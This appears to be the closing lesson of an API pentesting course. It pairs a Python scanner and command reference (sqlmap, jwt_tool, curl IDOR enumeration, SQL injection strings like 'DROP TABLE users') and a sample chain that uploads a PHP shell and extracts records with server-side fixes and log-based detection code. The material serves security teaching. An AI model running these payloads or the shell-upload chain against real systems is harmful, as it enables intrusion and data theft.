Full API Pentest
🔥 Vibe Prompt
"Run an automated pentest on a target API. Check: auth, IDOR, rate limiting, mass assignment, injection."
```python
import requests

BASE = "http://target.api.com"      # target base URL (placeholder from the page)
VALID_TOKEN = "valid_token"         # bearer token of the test account you own
CURRENT_USER = "current_user"       # user id that VALID_TOKEN belongs to
TIMEOUT = 10                        # seconds; never let a check hang forever
findings = []

# 1. Auth Bypass: an admin route must not answer 200 to an invalid bearer token
r = requests.get(f"{BASE}/admin", headers={"Authorization": "Bearer invalid"}, timeout=TIMEOUT)
if r.status_code == 200:
    findings.append("CRITICAL: Auth bypass!")

# 2. IDOR (Insecure Direct Object Reference): a valid token must only see its own orders
auth = {"Authorization": f"Bearer {VALID_TOKEN}"}
r = requests.get(f"{BASE}/api/orders/1", headers=auth, timeout=TIMEOUT)
if r.status_code == 200:
    r2 = requests.get(f"{BASE}/api/orders/2", headers=auth, timeout=TIMEOUT)
    if r2.status_code == 200 and r2.json().get("user_id") != CURRENT_USER:
        findings.append("HIGH: IDOR - can access other users' orders!")

# 3. Rate Limiting: 100 failed logins should be answered with 429 at some point
rate_limited = False
for _ in range(100):
    r = requests.post(f"{BASE}/api/login", json={"user": "admin", "pass": "wrong"}, timeout=TIMEOUT)
    if r.status_code == 429:
        rate_limited = True
        break
if not rate_limited:
    findings.append("HIGH: No rate limiting on /api/login!")

# 4. Mass Assignment: a profile update must ignore privileged fields such as role
r = requests.post(f"{BASE}/api/user/profile", json={"name": "test", "role": "admin"},
                  headers=auth, timeout=TIMEOUT)
if r.status_code == 200:
    findings.append("MEDIUM: Mass Assignment - role parameter accepted!")

# 5. Injection in API params (a 200 without an error string is only a weak signal; confirm manually)
sqli_payloads = ["' OR 1=1--", "'; DROP TABLE users--", "${7*7}"]
for payload in sqli_payloads:
    r = requests.get(f"{BASE}/api/search", params={"q": payload}, timeout=TIMEOUT)
    if r.status_code == 200 and "error" not in r.text.lower():
        findings.append(f"MEDIUM: Possible injection: {payload}")

for f in findings:
    print(f"⚠️ {f}")
```
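The script above tests from the client side. The server-side controls that make those checks come back clean are shown here as an added example (not code from the original page): an allowlist for profile updates against mass assignment, an object-level ownership check on order lookups against IDOR, and a per-client, per-account window counter on login. All names, sample orders and credentials are constructed.

```python
"""Server-side controls that close three of the findings the audit script above
looks for: mass assignment, IDOR and missing login rate limiting.
Framework-free model of request handling; every name and value is constructed."""
import time
from typing import Dict, Optional, Tuple

# --- Mass assignment: allowlist the fields a client may set; everything else
# (notably "role") is dropped before the update reaches the data layer.
PROFILE_WRITABLE = frozenset({"name", "email"})

def sanitize_profile_update(payload: Dict[str, object]) -> Dict[str, object]:
    return {k: v for k, v in payload.items() if k in PROFILE_WRITABLE}

# --- IDOR: authenticate, then authorize the specific object on every lookup.
ORDERS: Dict[int, Dict[str, object]] = {   # constructed sample data
    1: {"user_id": "alice", "total": 42},
    2: {"user_id": "bob", "total": 17},
}

def get_order(order_id: int, current_user: str) -> Tuple[int, Dict[str, object]]:
    """Return (status, body). Missing and foreign orders both yield 404 so the
    response does not reveal which ids exist."""
    order = ORDERS.get(order_id)
    if order is None or order["user_id"] != current_user:
        return 404, {"error": "not found"}
    return 200, order

# --- Rate limiting: fixed-window counter keyed by client address + account.
class RateLimiter:
    def __init__(self, limit: int, window: float) -> None:
        self.limit = limit
        self.window = window
        self._hits: Dict[str, Tuple[float, int]] = {}   # key -> (window start, count)

    def allow(self, key: str, now: Optional[float] = None) -> bool:
        now = time.monotonic() if now is None else now
        start, count = self._hits.get(key, (now, 0))
        if now - start >= self.window:          # window expired: start a new one
            start, count = now, 0
        count += 1
        self._hits[key] = (start, count)
        return count <= self.limit

LOGIN_LIMITER = RateLimiter(limit=5, window=60.0)

def login(client_ip: str, user: str, password: str, now: Optional[float] = None) -> int:
    """Return an HTTP status code; 429 once a client exceeds 5 attempts per minute
    against one account. The limiter runs before the credential check so that
    throttled attempts cost no database work."""
    if not LOGIN_LIMITER.allow(f"{client_ip}:{user}", now):
        return 429
    # constructed credential check; a real service compares a password hash
    return 200 if (user, password) == ("alice", "correct horse") else 401

if __name__ == "__main__":
    print(sanitize_profile_update({"name": "test", "role": "admin"}))   # {'name': 'test'}
    print(get_order(2, "alice"))                                        # (404, {'error': 'not found'})
    print([login("10.0.0.1", "admin", "wrong", now=float(i)) for i in range(7)])  # five 401s, then 429
```

The `now` parameter exists so the window logic can be exercised deterministically; in production the limiter reads the monotonic clock and the counter would live in a shared store rather than process memory.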
API Pentest Checklist
| Check | Tool |
|-------|------|
| Auth bypass | Burp Repeater |
| IDOR | Manual UUID increment |
| Rate limiting | Bombardier |
| Mass assignment | Add unexpected fields |
| Injection | sqlmap |
| JWT | jwt_tool |
API Pentest Course Complete!
- ✅ Recon
- ✅ Auth Bypass
- ✅ SQLi/NoSQLi
- ✅ JWT/Session
- ✅ Full Pentest
Key Points
- Understand the core concepts thoroughly
- Practice with hands-on code examples
- Apply knowledge to real-world problems
- Review and reinforce through exercises
Further Learning
- Official documentation
- Open source projects on GitHub
- Community forums and discussions
- Related courses and tutorials
Pentest Checklist
Reconnaissance
- [ ] Enumerate subdomains (subfinder, amass)
- [ ] Detect technology stack (wappalyzer, whatweb)
- [ ] Find API documentation (Swagger, OpenAPI, GraphQL introspection)
- [ ] Extract endpoints from JavaScript files (LinkFinder)
- [ ] Check .well-known endpoints
Discovery
- [ ] Fuzz API routes (Kiterunner, ffuf)
- [ ] Identify authentication mechanisms
- [ ] Discover hidden parameters (arjun)
- [ ] Test HTTP methods on all endpoints
- [ ] Check for CORS misconfiguration
Vulnerability Testing
- [ ] SQL injection (sqlmap)
- [ ] NoSQL injection (manual payloads)
- [ ] XSS (dalfox)
- [ ] IDOR (manual + automated)
- [ ] Mass assignment (test extra fields)
- [ ] JWT attacks (jwt_tool)
- [ ] Rate limiting bypass
- [ ] SSRF (test redirects, internal services)
- [ ] Path traversal
- [ ] Server-side template injection
Exploitation
- [ ] Extract sensitive data
- [ ] Escalate privileges
- [ ] Access other users' data
- [ ] Document proof of concept
Reporting
- [ ] Write executive summary
- [ ] Detail each finding with CVSS score
- [ ] Include request/response evidence
- [ ] Provide remediation steps
- [ ] Prioritize by severity
Sample Exploitation Chain
1. Discovery: Found /api/upload endpoint via fuzzing
2. Testing: Uploaded PHP file, got 403 (extension blocked)
3. Bypass: Changed extension .php5 -> got 200
4. Access: Accessed uploaded file at /uploads/shell.php5
5. Escalation: Executed commands on server
6. Impact: Full database access, 50k records extracted
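Step 3 of that chain worked because the server used a denylist (block `.php`) that did not cover `.php5`. An upload handler that closes that gap, as an added example that is not code from the original page: an extension allowlist instead of a denylist, one extension only, the first bytes of the content checked against the declared type, and a server-generated file name so nothing the client chose reaches the file system. The allowed types, magic numbers and sample bytes are constructed.

```python
"""Upload validation that resists the .php -> .php5 bypass in the chain above.
Added example; all names and sample bytes are constructed."""
import os
import uuid
from typing import Tuple

ALLOWED_EXT = frozenset({"png", "jpg", "jpeg", "gif", "pdf"})
# Leading bytes expected for each allowed type (constructed subset of magic numbers)
MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "pdf": b"%PDF-",
}

def validate_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason or stored file name)."""
    # Keep only the final path component so "../x.png" cannot escape the upload dir
    name = os.path.basename(filename.replace("\\", "/"))
    if "\x00" in name or name.count(".") != 1:
        # null bytes and double extensions (shell.php.jpg) are rejected outright;
        # this also rejects harmless names like my.photo.png, which is acceptable
        return False, "rejected: null byte, missing or multiple extensions"
    stem, ext = name.rsplit(".", 1)
    if not stem:
        return False, "rejected: empty file name"
    ext = ext.lower()                       # .PHP5 and .php5 are the same thing
    if ext not in ALLOWED_EXT:              # allowlist: unknown means rejected
        return False, f"rejected: extension .{ext} not in allowlist"
    if not content.startswith(MAGIC[ext]):  # declared type must match the bytes
        return False, "rejected: content does not match declared type"
    # Never reuse the client's name: the stored name is random and the extension
    # is the validated one
    return True, f"{uuid.uuid4().hex}.{ext}"

if __name__ == "__main__":
    print(validate_upload("shell.php5", b"<?php echo 1; ?>"))      # rejected, not in allowlist
    print(validate_upload("shell.php.jpg", b"\xff\xd8\xff"))       # rejected, double extension
    print(validate_upload("photo.JPG", b"\xff\xd8\xff\xe0..."))    # accepted, random .jpg name
```

Serving the upload directory with script execution disabled is the second, independent layer; the validator above only ensures that what lands there is the type the application expects.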
Summary
A complete pentest follows a structured methodology: recon, discovery, vulnerability testing, exploitation, and reporting. Each finding includes evidence and remediation.
Key takeaways:
- Methodology: recon -> discovery -> vulnerability testing -> exploitation -> reporting
- Tools: subfinder, kiterunner, sqlmap, jwt_tool, ffuf, burp suite
- Exploitation chain: find endpoint -> test -> bypass -> access -> escalate
- Reporting: executive summary, detailed findings with CVSS, evidence, remediation
You have completed the API security pentesting course.
Remediation Timeline
| Priority | Timeline | Actions |
|----------|----------|---------|
| Critical | 24 hours | Fix SQL injection, mass assignment |
| High | 1 week | Add rate limiting, JWT hardening |
| Medium | 2 weeks | Add security headers, input validation |
| Low | 1 month | Server hardening, documentation |
Full Pentest Commands Reference
```bash
# 1. Recon
subfinder -d example.com | httpx
# 2. Discovery
ffuf -w api-endpoints.txt -u https://api.example.com/FUZZ
# 3. SQL Injection
sqlmap -u "https://api.example.com/users?id=1" --batch --dbs
# 4. XSS
dalfox url https://api.example.com/search?q=test
# 5. JWT
jwt_tool eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c
# 6. IDOR
for id in {1..100}; do curl -s -o /dev/null -w "%{http_code}\n" -H "Authorization: Bearer $TOKEN" "https://api.example.com/api/users/$id"; done | sort | uniq -c
# 7. Rate Limiting
for i in {1..200}; do curl -s -o /dev/null -w "%{http_code}\n" https://api.example.com/api/public; done | sort | uniq -c
```
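The IDOR and rate-limiting loops above leave a distinctive trail in the server's access log: one client walking sequential object ids, and one client collecting a burst of 401s on the login route. As an added example (not from the original page), the detection logic below parses combined-format log lines and flags both patterns; the log lines, addresses and thresholds are constructed.

```python
"""Detecting id enumeration and login brute force in an access log.
Added example over constructed log lines in Apache combined format."""
import re
from collections import Counter, defaultdict
from typing import Dict, List

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)
ID_PATH_RE = re.compile(r"^/api/users/(\d+)$")

def _line(ip, method, path, status, ts="10/Oct/2024:13:55:36 +0000"):
    """Build one constructed combined-format log line."""
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 231'

# Constructed sample: 10.0.0.5 walks ids 1..30 (some return 404, which still
# counts as a probe), 10.0.0.9 fails login 12 times, 192.0.2.7 is a normal user.
SAMPLE_LOG = "\n".join(
    [_line("10.0.0.5", "GET", f"/api/users/{i}", 200 if i % 3 else 404) for i in range(1, 31)]
    + [_line("10.0.0.9", "POST", "/api/login", 401) for _ in range(12)]
    + [_line("192.0.2.7", "GET", "/api/users/42", 200),
       _line("192.0.2.7", "POST", "/api/login", 200)]
)

def parse_log(text: str) -> List[Dict[str, str]]:
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:                          # skip lines that do not match the format
            events.append(m.groupdict())
    return events

def detect_enumeration(events, min_ids: int = 20, min_run: int = 10):
    """Flag clients that requested many distinct ids or a long consecutive run."""
    ids_by_ip = defaultdict(set)
    for e in events:
        m = ID_PATH_RE.match(e["path"])
        if m:
            ids_by_ip[e["ip"]].add(int(m.group(1)))
    alerts = []
    for ip, ids in ids_by_ip.items():
        ordered = sorted(ids)
        run = best = 1
        for a, b in zip(ordered, ordered[1:]):   # longest run of consecutive ids
            run = run + 1 if b == a + 1 else 1
            best = max(best, run)
        if len(ids) >= min_ids or best >= min_run:
            alerts.append({"ip": ip, "distinct_ids": len(ids), "longest_run": best})
    return alerts

def detect_login_bruteforce(events, min_failures: int = 10):
    """Count 401 responses to POST /api/login per client."""
    fails = Counter(e["ip"] for e in events
                    if e["method"] == "POST" and e["path"] == "/api/login" and e["status"] == "401")
    return sorted((ip, n) for ip, n in fails.items() if n >= min_failures)

if __name__ == "__main__":
    ev = parse_log(SAMPLE_LOG)
    print(detect_enumeration(ev))        # [{'ip': '10.0.0.5', 'distinct_ids': 30, 'longest_run': 30}]
    print(detect_login_bruteforce(ev))   # [('10.0.0.9', 12)]
```

A real deployment would evaluate these counters per time window (the sample uses one timestamp for brevity) and key the brute-force counter on the target account as well as the source address, since attempts can be spread across many addresses.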
Next Steps
| Activity | Description |
|----------|-------------|
| Practice | Set up a vulnerable API lab (DVWA, WebGoat) |
| Certifications | Take GPEN, OSCP, or PNPT |
| Bug Bounties | Apply skills on HackerOne, Bugcrowd |
| Build Tools | Create your own pentest automation scripts |
You have completed the course. You now understand API security pentesting from reconnaissance to reporting.